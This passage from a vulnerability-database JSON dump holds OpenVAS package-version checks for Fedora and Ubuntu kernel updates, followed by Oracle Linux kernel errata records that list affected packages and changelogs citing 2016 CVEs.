Sep 2016)\");\n script_cve_id(\"CVE-2016-6480\", \"CVE-2016-6828\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-2e5ebfed6d\");\n script_tag(name: \"summary\", value: \"Check the version of kernel\");\n\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\n of detect NVT and check if the version is vulnerable or not.\");\n\n script_tag(name: \"insight\", value: \"The kernel meta package\");\n\n script_tag(name: \"affected\", value: \"kernel on Fedora 24\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"FEDORA\", value: \"2016-2e5ebfed6d\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BKRCZ4MFYMHSC2OUN27IALXPL5Y3PDJH\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.7.2~201.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-11-19T13:00:14", "references": ["3126-2", "http://www.ubuntu.com/usn/usn-3126-2/"], "pluginID": "1361412562310842948", "description": "The remote host is missing an update for the ", "edition": 7, "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "published": "2016-11-11T00:00:00", "title": "Ubuntu Update for linux-ti-omap4 USN-3126-2", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117", "CVE-2016-7042"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310842948", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842948", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-ti-omap4 USN-3126-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842948\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-11 11:15:37 +0100 (Fri, 11 Nov 2016)\");\n script_cve_id(\"CVE-2016-7042\", \"CVE-2016-7117\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-3126-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-ti-omap4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Ondrej Kozina discovered that the keyring\n interface in the Linux kernel contained a buffer overflow when displaying\n timeout events via the /proc/keys interface. A local attacker could use this\n to cause a denial of service (system crash). (CVE-2016-7042)\n\nDmitry Vyukov discovered a use-after-free vulnerability during error\nprocessing in the recvmmsg(2) implementation in the Linux kernel. A remote\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-7117)\");\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3126-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3126-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-1493-omap4\", ver:\"3.2.0-1493.120\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-omap4\", ver:\"3.2.0.1493.88\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:47:08", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "x86_64", "packageFilename": "kernel-debug-2.6.32-642.13.1.el6.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "i686", "packageFilename": "kernel-devel-2.6.32-642.13.1.el6.i686.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "noarch", "packageFilename": "kernel-firmware-2.6.32-642.13.1.el6.noarch.rpm", "packageName": "kernel-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "noarch", "packageFilename": "kernel-firmware-2.6.32-642.13.1.el6.noarch.rpm", "packageName": "kernel-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "x86_64", "packageFilename": "python-perf-2.6.32-642.13.1.el6.x86_64.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "i686", "packageFilename": "kernel-debug-devel-2.6.32-642.13.1.el6.i686.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "i686", "packageFilename": "kernel-debug-devel-2.6.32-642.13.1.el6.i686.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "i686", "packageFilename": "python-perf-2.6.32-642.13.1.el6.i686.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "x86_64", "packageFilename": "kernel-debug-devel-2.6.32-642.13.1.el6.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "i686", "packageFilename": "perf-2.6.32-642.13.1.el6.i686.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "x86_64", "packageFilename": "kernel-2.6.32-642.13.1.el6.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "i686", "packageFilename": "kernel-2.6.32-642.13.1.el6.i686.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "x86_64", "packageFilename": "perf-2.6.32-642.13.1.el6.x86_64.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "i686", "packageFilename": "kernel-debug-2.6.32-642.13.1.el6.i686.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "x86_64", "packageFilename": "kernel-headers-2.6.32-642.13.1.el6.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "noarch", "packageFilename": "kernel-doc-2.6.32-642.13.1.el6.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "noarch", "packageFilename": "kernel-doc-2.6.32-642.13.1.el6.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "noarch", "packageFilename": "kernel-abi-whitelists-2.6.32-642.13.1.el6.noarch.rpm", "packageName": "kernel-abi-whitelists", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "noarch", "packageFilename": "kernel-abi-whitelists-2.6.32-642.13.1.el6.noarch.rpm", "packageName": "kernel-abi-whitelists", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "x86_64", "packageFilename": "kernel-devel-2.6.32-642.13.1.el6.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "i686", "packageFilename": "kernel-headers-2.6.32-642.13.1.el6.i686.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "src", "packageFilename": "kernel-2.6.32-642.13.1.el6.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "src", "packageFilename": "kernel-2.6.32-642.13.1.el6.src.rpm", "packageName": "kernel", "operator": "lt"}], "description": "[2.6.32-642.13.1]\n- [net] Fix use after free in the recvmmsg exit path (Davide Caratti) [1390805 1390046] {CVE-2016-7117}\n- [net] vlan: Propagate MAC address to VLANs (Jarod Wilson) [1396479 1381585]\n- [net] tcp: fix use after free in tcp_xmit_retransmit_queue() (Mateusz Guzik) [1379527 1379529] {CVE-2016-6828}\n- [net] netfilter: x_tables: check for bogus target offset (Mateusz Guzik) [1351421 1351422] {CVE-2016-4998}\n- [net] netfilter: x_tables: validate e->target_offset early (Mateusz Guzik) [1351421 1351422] {CVE-2016-4998}\n- [net] netfilter: x_tables: make sure e->next_offset covers remaining blob size (Mateusz Guzik) [1351421 1351422] {CVE-2016-4998}\n- [net] ipv6: Don't change dst->flags using assignments (Marcelo Leitner) [1391974 1389478]\n- [scsi] libfc: Revert: use offload EM instance again (Chris Leech) [1392818 1383078]\n- [netdrv] sfc: report supported link speeds on SFP connections (Jarod Wilson) [1388168 1384621]\n- [drm] vmwgfx: respect 'nomodeset' (Rob Clark) [1392875 1342114]\n- [hv] avoid vfree() on crash (Vitaly Kuznetsov) [1385482 1333167]\n- [hv] vmbus: handle various crash scenarios (Vitaly Kuznetsov) [1385482 1333167]\n- [hv] vmbus: Support kexec on ws2012 r2 and above (Vitaly Kuznetsov) [1385482 1333167]\n- [hv] vmbus: Support handling messages on multiple CPUs (Vitaly Kuznetsov) [1385482 1333167]\n- [hv] vmbus: remove code duplication in message handling (Vitaly Kuznetsov) [1385482 1333167]\n- [hv] vmbus: avoid unneeded compiler optimizations in vmbus_wait_for_unload() (Vitaly Kuznetsov) [1385482 1333167]\n- [hv] vmbus: avoid wait_for_completion() on crash (Vitaly Kuznetsov) [1385482 1333167]\n- [hv] vmbus: avoid scheduling in interrupt context in vmbus_initiate_unload() (Vitaly Kuznetsov) [1385482 1333167]\n- [hv] vmbus: don't loose HVMSG_TIMER_EXPIRED messages (Vitaly Kuznetsov) [1385482 1333167]\n- [hv] vmbus: Force all channel messages to be delivered on CPU 0 (Vitaly Kuznetsov) [1385482 1333167]\n- [scsi] mpt3sas: Fix panic when aer correct error occurred (Frank Ramsay) [1396272 1374743]\n- [fs] nfs4.1: Remove a bogus BUG_ON() in nfs4_layoutreturn_done (Steve Dickson) [1385480 1376467]\n- [firmware] dmi_scan: DMI information in sysfs is missing on SMBIOS 3.0 based systems (Steve Best) [1393464 1353807]\n[2.6.32-642.12.1]\n- [netdrv] mlx5: Fix RC transport send queue overhead computation (Slava Shwartsman) [1392799 1384212]", "edition": 3, "reporter": "Oracle", "published": "2017-01-10T00:00:00", "title": "kernel security and bug fix update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7117", "CVE-2016-6828", "CVE-2016-4998"], "modified": "2017-01-10T00:00:00", "id": "ELSA-2017-0036", "href": "http://linux.oracle.com/errata/ELSA-2017-0036.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:44:11", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "x86_64", "packageFilename": "kernel-tools-libs-3.10.0-514.6.1.el7.x86_64.rpm", "packageName": "kernel-tools-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "x86_64", "packageFilename": "kernel-3.10.0-514.6.1.el7.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "x86_64", "packageFilename": "kernel-headers-3.10.0-514.6.1.el7.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "x86_64", "packageFilename": "kernel-debug-devel-3.10.0-514.6.1.el7.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "src", "packageFilename": "kernel-3.10.0-514.6.1.el7.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "x86_64", "packageFilename": "kernel-devel-3.10.0-514.6.1.el7.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "noarch", "packageFilename": "kernel-abi-whitelists-3.10.0-514.6.1.el7.noarch.rpm", "packageName": "kernel-abi-whitelists", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "x86_64", "packageFilename": "kernel-tools-libs-devel-3.10.0-514.6.1.el7.x86_64.rpm", "packageName": "kernel-tools-libs-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "x86_64", "packageFilename": "kernel-tools-3.10.0-514.6.1.el7.x86_64.rpm", "packageName": "kernel-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "x86_64", "packageFilename": "python-perf-3.10.0-514.6.1.el7.x86_64.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "x86_64", "packageFilename": "kernel-debug-3.10.0-514.6.1.el7.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "x86_64", "packageFilename": "perf-3.10.0-514.6.1.el7.x86_64.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "noarch", "packageFilename": "kernel-doc-3.10.0-514.6.1.el7.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}], "description": "- [3.10.0-514.6.1.OL7]\n- Oracle Linux certificates (Alexey Petrenko)\n- Oracle Linux RHCK Module Signing Key was compiled into kernel (olkmod_signing_key.x509)(alexey.petrenko@oracle.com)\n- Update x509.genkey [bug 24817676]\n[3.10.0-514.6.1]\n- [net] sctp: validate chunk len before actually using it (Hangbin Liu) [1399458 1399459] {CVE-2016-9555}\n- [net] sctp: rename WORD_TRUNC/ROUND macros (Hangbin Liu) [1399458 1399459] {CVE-2016-9555}\n- [net] sctp: keep fragmentation point aligned to word size (Hangbin Liu) [1399458 1399459] {CVE-2016-9555}\n- [x86] Mark Intel Purley supported (Steve Best) [1402824 1371748]\n- [acpi] sleep: Do not save NVS for new machines to accelerate S3 (Prarit Bhargava) [1402326 1385527]\n- [scsi] megaraid_sas: Send SYNCHRONIZE_CACHE for VD to firmware (Tomas Henzl) [1398179 1380447]\n- [scsi] megaraid_sas: Fix data integrity failure for JBOD (passthrough) devices (Tomas Henzl) [1398179 1380447]\n- [scsi] megaraid_sas: fix macro MEGASAS_IS_LOGICAL to avoid regression (Tomas Henzl) [1398179 1380447]\n- [netdrv] net/hyperv: avoid uninitialized variable (Vitaly Kuznetsov) [1395578 1392220]\n- [netdrv] netvsc: Remove mistaken udp.h inclusion (Vitaly Kuznetsov) [1395578 1392220]\n- [netdrv] netvsc: fix checksum on UDP IPV6 (Vitaly Kuznetsov) [1395578 1392220]\n- [netdrv] hv_netvsc: add ethtool statistics for tx packet issues (Vitaly Kuznetsov) [1395578 1392220]\n- [netdrv] hv_netvsc: rearrange start_xmit (Vitaly Kuznetsov) [1395578 1392220]\n- [fs] Retry operation on EREMOTEIO on an interrupted slot (Steve Dickson) [1394710 1378981]\n- [fs] rbd: don't retry watch reregistration if header object is gone (Ilya Dryomov) [1393485 1378186]\n- [fs] rbd: don't wait for the lock forever if blacklisted (Ilya Dryomov) [1393485 1378186]\n- [fs] rbd: lock_on_read map option (Ilya Dryomov) [1393485 1378186]\n- [hv] do not lose pending heartbeat vmbus packets (Vitaly Kuznetsov) [1392035 1378615]\n- [netdrv] netvsc: fix incorrect receive checksum offloading (Vitaly Kuznetsov) [1391617 1388702]\n- [x86] kvm: lapic: cap __delay at lapic_timer_advance_ns (Marcelo Tosatti) [1391614 1389431]\n- [x86] kvm: x86: move nsec_to_cycles from x86.c to x86.h (Marcelo Tosatti) [1391614 1389431]\n- [net] tcp: fix use after free in tcp_xmit_retransmit_queue() (Mateusz Guzik) [1379530 1379531] {CVE-2016-6828}\n[3.10.0-514.5.1]\n- [fs] Fix regression which breaks DFS mounting (Sachin Prabhu) [1400055 1302329]\n- [fs] Move check for prefix path to within cifs_get_root() (Sachin Prabhu) [1400055 1302329]\n- [fs] Compare prepaths when comparing superblocks (Sachin Prabhu) [1400055 1302329]\n- [fs] Fix memory leaks in cifs_do_mount() (Sachin Prabhu) [1400055 1302329]\n- [fs] cifs: make share unaccessible at root level mountable (Sachin Prabhu) [1400055 1302329]\n- [kernel] sched: Fix possible divide by zero in avg_atom() calculation (Mateusz Guzik) [1398361 1392466]\n- [scsi] megaraid_sas: Do not set MPI2_TYPE_CUDA for JBOD FP path for FW which does not support JBOD sequence map (Tomas Henzl) [1398175 1380441]\n- [x86] smp: Fix __max_logical_packages value setup (Prarit Bhargava) [1398173 1394239]\n- [x86] revert 'smp: Fix __max_logical_packages value setup' (Prarit Bhargava) [1398173 1394239]\n- [watchdog] hpwdt: add support for iLO5 (Linda Knippers) [1397747 1382798]\n- [x86] kexec: Fix kexec crash in syscall kexec_file_load() (Pingfan Liu) [1395573 1385109]\n- [powerpc] ppc64: Fix incorrect return value from __copy_tofrom_user (Steve Best) [1395565 1387244]\n- [scsi] megaraid-sas: request irqs later (Tomas Henzl) [1394711 1392978]\n- [netdrv] i40e: Fix errors resulted while turning off TSO (Stefan Assmann) [1394708 1378509]\n- [fs] ext4: pre-zero allocated blocks for DAX IO (Eric Sandeen) [1394707 1367989]\n- [powerpc] pseries: use pci_host_bridge.release_fn() to kfree(phb) (Steve Best) [1393724 1385635]\n- [misc] genwqe: Change default access rights for device node (Steve Best) [1393723 1325797]\n- [misc] hpilo: Changes to support new security states in iLO5 FW (Nigel Croxon) [1393720 1376576]\n- [kernel] sched/core: Fix a race between try_to_wake_up() and a woken up task (Lauro Ramos Venancio) [1393719 1379256]\n- [hid] i2c-hid: exit if the IRQ is not valid (David Arcari) [1393717 1376599]\n- [x86] Add support for missing Kabylake Sunrise Point PCH (David Arcari) [1392033 1379401]\n- [net] sctp: not return ENOMEM err back in sctp_packet_transmit (Xin Long) [1392025 1371362]\n- [net] sctp: make sctp_outq_flush/tail/uncork return void (Xin Long) [1392025 1371362]\n- [net] sctp: save transmit error to sk_err in sctp_outq_flush (Xin Long) [1392025 1371362]\n- [net] sctp: free msg->chunks when sctp_primitive_SEND return err (Xin Long) [1392025 1371362]\n- [net] sctp: do not return the transmit err back to sctp_sendmsg (Xin Long) [1392025 1371362]\n- [net] sctp: remove the unnecessary state check in sctp_outq_tail (Xin Long) [1392025 1371362]\n- [net] netdev, sched/wait: Fix sleeping inside wait event (Paolo Abeni) [1392024 1382175]\n- [net] Separate the close_list and the unreg_list (Paolo Abeni) [1392024 1382175]\n- [vfio] pci: Fix ordering of eventfd vs virqfd shutdown (Alex Williamson) [1391611 1322026]\n- [net] Fix use after free in the recvmmsg exit path (Davide Caratti) [1390806 1390047] {CVE-2016-7117}\n- [fs] nfsd: don't return an unhashed lock stateid after taking mutex ('J. Bruce Fields') [1390672 1368577]\n- [fs] nfsd: Fix race between FREE_STATEID and LOCK ('J. Bruce Fields') [1390672 1368577]\n- [fs] nfsd: Close race between nfsd4_release_lockowner and nfsd4_lock ('J. Bruce Fields') [1390672 1368577]\n- [fs] nfsd: Extend the mutex holding region around in nfsd4_process_open2() ('J. Bruce Fields') [1390672 1368577]\n- [fs] nfsd: Always lock state exclusively ('J. Bruce Fields') [1390672 1368577]\n- [infiniband] ib/ipoib: move back IB LL address into the hard header (Jonathan Toppins) [1390668 1378656]\n[3.10.0-514.4.1]\n- [net] rtnetlink: fix rtnl_vfinfo_size (Sabrina Dubroca) [1395811 1392128]\n- [netdrv] ixgbe: test for trust in macvlan adjustments for vf (Ken Cox) [1395572 1379787]\n- [kernel] timekeeping: Copy the shadow-timekeeper over the real timekeeper last (Prarit Bhargava) [1395577 1344747]\n[3.10.0-514.3.1]\n- [net] team: Fixing a bug in team driver due to incorrect 'unsigned int' to 'int' conversion (Hangbin Liu) [1392023 1382098]", "edition": 3, "reporter": "Oracle", "published": "2017-01-17T00:00:00", "title": "kernel security, bug fix, and enhancement update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7117", "CVE-2016-9555", "CVE-2016-6828"], "modified": "2017-01-17T00:00:00", "id": "ELSA-2017-0086", "href": "http://linux.oracle.com/errata/ELSA-2017-0086.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:48:41", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.23.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-4.1.12-61.1.23.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.23.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-4.1.12-61.1.23.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.23.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-4.1.12-61.1.23.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.23.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-4.1.12-61.1.23.el7uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.23.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-4.1.12-61.1.23.el7uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.5.3-2.el6", "arch": "x86_64", "packageFilename": "dtrace-modules-4.1.12-61.1.23.el6uek-0.5.3-2.el6.x86_64.rpm", "packageName": "dtrace-modules-4.1.12-61.1.23.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.23.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-4.1.12-61.1.23.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.23.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-4.1.12-61.1.23.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.23.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-4.1.12-61.1.23.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.5.3-2.el6", "arch": "src", "packageFilename": "dtrace-modules-4.1.12-61.1.23.el6uek-0.5.3-2.el6.src.rpm", "packageName": "dtrace-modules-4.1.12-61.1.23.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.5.3-2.el7", "arch": "src", "packageFilename": "dtrace-modules-4.1.12-61.1.23.el7uek-0.5.3-2.el7.src.rpm", "packageName": "dtrace-modules-4.1.12-61.1.23.el7uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.23.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-4.1.12-61.1.23.el7uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.23.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-4.1.12-61.1.23.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.5.3-2.el7", "arch": "x86_64", "packageFilename": "dtrace-modules-4.1.12-61.1.23.el7uek-0.5.3-2.el7.x86_64.rpm", "packageName": "dtrace-modules-4.1.12-61.1.23.el7uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.23.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-4.1.12-61.1.23.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.23.el7uek", "arch": "src", "packageFilename": "kernel-uek-4.1.12-61.1.23.el7uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.23.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-4.1.12-61.1.23.el7uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.23.el6uek", "arch": "src", "packageFilename": "kernel-uek-4.1.12-61.1.23.el6uek.src.rpm", 